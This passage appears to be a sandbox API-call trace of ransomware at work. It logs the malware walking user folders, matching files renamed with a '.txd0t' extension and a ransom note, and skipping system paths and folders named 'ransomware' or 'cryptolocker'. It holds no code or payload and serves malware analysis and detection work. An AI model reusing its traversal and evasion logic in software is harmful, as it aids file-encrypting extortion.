(psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.362] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43e16650, ftCreationTime.dwHighDateTime=0x1d5e96d, ftLastAccessTime.dwLowDateTime=0x24e5b230, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x530f3d77, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x461c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="2oN gpnuW1JXd5I9rz.swf.txd0t", cAlternateFileName="2ONGPN~1.TXD")) returned 1 [0090.362] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf.txd0t", psz2=".") returned 1 [0090.362] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf.txd0t", psz2="..") returned 1 [0090.362] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.362] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0090.362] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2oN gpnuW1JXd5I9rz.swf.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t" [0090.362] PathFindExtensionW (pszPath="2oN gpnuW1JXd5I9rz.swf.txd0t") returned=".txd0t" [0090.362] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.362] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a48dba0, ftCreationTime.dwHighDateTime=0x1d5ee05, ftLastAccessTime.dwLowDateTime=0xd9522960, ftLastAccessTime.dwHighDateTime=0x1d5ebeb, ftLastWriteTime.dwLowDateTime=0x5311bf38, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17f7f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="2q3Ks4TNs0IQQ.swf.txd0t", cAlternateFileName="2Q3KS4~1.TXD")) returned 1 [0090.362] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf.txd0t", psz2=".") returned 1 [0090.362] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf.txd0t", psz2="..") returned 1 [0090.362] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.362] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0090.362] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2q3Ks4TNs0IQQ.swf.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t" [0090.362] PathFindExtensionW (pszPath="2q3Ks4TNs0IQQ.swf.txd0t") returned=".txd0t" [0090.362] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.362] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb99a5d50, ftCreationTime.dwHighDateTime=0x1d5e6b8, ftLastAccessTime.dwLowDateTime=0x109bc870, ftLastAccessTime.dwHighDateTime=0x1d5e27a, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10908, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="d0y3irQ9gxE8.flv.txd0t", cAlternateFileName="D0Y3IR~1.TXD")) returned 1 [0090.362] StrCmpW (psz1="d0y3irQ9gxE8.flv.txd0t", psz2=".") returned 1 [0090.362] StrCmpW (psz1="d0y3irQ9gxE8.flv.txd0t", psz2="..") returned 1 [0090.362] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.363] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0090.363] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="d0y3irQ9gxE8.flv.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t" [0090.363] PathFindExtensionW (pszPath="d0y3irQ9gxE8.flv.txd0t") returned=".txd0t" [0090.363] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.363] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e5d300, ftCreationTime.dwHighDateTime=0x1d5e133, ftLastAccessTime.dwLowDateTime=0x883aa2b0, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x95cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="r47Nb711Z06w9.mp4.txd0t", cAlternateFileName="R47NB7~1.TXD")) returned 1 [0090.363] StrCmpW (psz1="r47Nb711Z06w9.mp4.txd0t", psz2=".") returned 1 [0090.363] StrCmpW (psz1="r47Nb711Z06w9.mp4.txd0t", psz2="..") returned 1 [0090.363] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.363] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0090.363] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="r47Nb711Z06w9.mp4.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t" [0090.363] PathFindExtensionW (pszPath="r47Nb711Z06w9.mp4.txd0t") returned=".txd0t" [0090.363] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.363] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e5d300, ftCreationTime.dwHighDateTime=0x1d5e133, ftLastAccessTime.dwLowDateTime=0x883aa2b0, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x95cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="r47Nb711Z06w9.mp4.txd0t", cAlternateFileName="R47NB7~1.TXD")) returned 0 [0090.363] FindClose (in: hFindFile=0xec24f0 | out: hFindFile=0xec24f0) returned 1 [0090.363] GetProcessHeap () returned 0xe30000 [0090.363] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.363] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WlTa", cAlternateFileName="")) returned 0 [0090.363] FindClose (in: hFindFile=0xec20b0 | out: hFindFile=0xec20b0) returned 1 [0090.363] GetProcessHeap () returned 0xe30000 [0090.363] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.363] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0090.363] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0090.363] GetProcessHeap () returned 0xe30000 [0090.363] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec60f0 | out: hHeap=0xe30000) returned 1 [0090.363] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0090.363] StrCmpW (psz1="Public", psz2=".") returned 1 [0090.363] StrCmpW (psz1="Public", psz2="..") returned 1 [0090.363] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0090.363] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0090.364] StrNCatW (in: psz1="C:\\Users\\", psz2="Public", cchMax=1042 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\system32\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\system\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\local\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\boot\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\perflogs\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\programdata\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\drivers\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\wsus\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="crypt_detect") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="cryptolocker") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="ransomware") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\WINDOWS") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.364] StrStrIW (lpFirst="C:\\Users\\Public", lpSrch="C:\\Program Files") returned 0x0 [0090.364] GetProcessHeap () returned 0xe30000 [0090.364] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0xedac48 [0090.364] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.364] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0090.364] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0090.364] StrCmpW (psz1=".", psz2=".") returned 0 [0090.364] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.365] StrCmpW (psz1="..", psz2=".") returned 1 [0090.365] StrCmpW (psz1="..", psz2="..") returned 0 [0090.365] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1 [0090.365] StrCmpW (psz1="AccountPictures", psz2=".") returned 1 [0090.365] StrCmpW (psz1="AccountPictures", psz2="..") returned 1 [0090.365] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.365] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.365] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="AccountPictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\system32\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\system\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\local\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\boot\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\perflogs\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\programdata\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\drivers\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\wsus\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="crypt_detect") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="cryptolocker") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="ransomware") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\WINDOWS") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.365] StrStrIW (lpFirst="C:\\Users\\Public\\AccountPictures", lpSrch="C:\\Program Files") returned 0x0 [0090.365] GetProcessHeap () returned 0xe30000 [0090.365] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xedc0f8 [0090.366] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\AccountPictures", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0090.366] StrNCatW (in: psz1="C:\\Users\\Public\\AccountPictures", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures\\*") returned="C:\\Users\\Public\\AccountPictures\\*" [0090.366] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0090.366] StrCmpW (psz1=".", psz2=".") returned 0 [0090.366] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.366] StrCmpW (psz1="..", psz2=".") returned 1 [0090.366] StrCmpW (psz1="..", psz2="..") returned 0 [0090.366] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.366] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.366] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.366] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.366] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0090.366] GetProcessHeap () returned 0xe30000 [0090.366] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.366] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0090.366] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0090.366] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0090.366] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.366] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.366] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0090.366] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="crypt_detect") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="cryptolocker") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="ransomware") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.367] StrStrIW (lpFirst="C:\\Users\\Public\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0090.367] GetProcessHeap () returned 0xe30000 [0090.367] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xedc0f8 [0090.367] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0090.367] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0090.367] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec24f0 [0090.367] StrCmpW (psz1=".", psz2=".") returned 0 [0090.367] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x13, 